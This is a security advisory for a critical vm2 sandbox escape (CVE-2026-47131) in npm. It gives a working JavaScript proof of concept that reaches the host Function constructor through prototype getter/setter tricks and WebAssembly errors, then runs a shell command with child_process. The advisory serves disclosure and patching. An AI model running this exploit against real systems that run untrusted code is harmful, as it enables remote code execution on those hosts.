CRITICAL 10.0 npm
vm2 has a Sandbox Escape issue
GHSA-v6mx-mf47-r5wg · CVE-2026-47131
Published · Modified
Description
Summary
By combining Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"), Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js's ERR_INVALID_ARG_TYPE Error, the host's TypeError constructor can be obtained, which allows the escape from the sandbox.
This allows attackers to run arbitrary code.
PoC
"use strict";
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
"use strict";
const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");
async function f() {
try {
await WebAssembly.compileStreaming();
} catch(e) {
setProto.call(getProto.call(e), null);
}
try {
await WebAssembly.compileStreaming();
} catch(e) {
const HostFunction = e.constructor.constructor;
new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
}
}
f();
`);
Impact
Sandbox Escape → RCE
References
- WEB https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-47131
- WEB https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8
- PACKAGE https://github.com/patriksimek/vm2
- WEB https://github.com/patriksimek/vm2/releases/tag/v3.11.4
Ready to move
Start Securing
Free, no credit card | First findings in minutes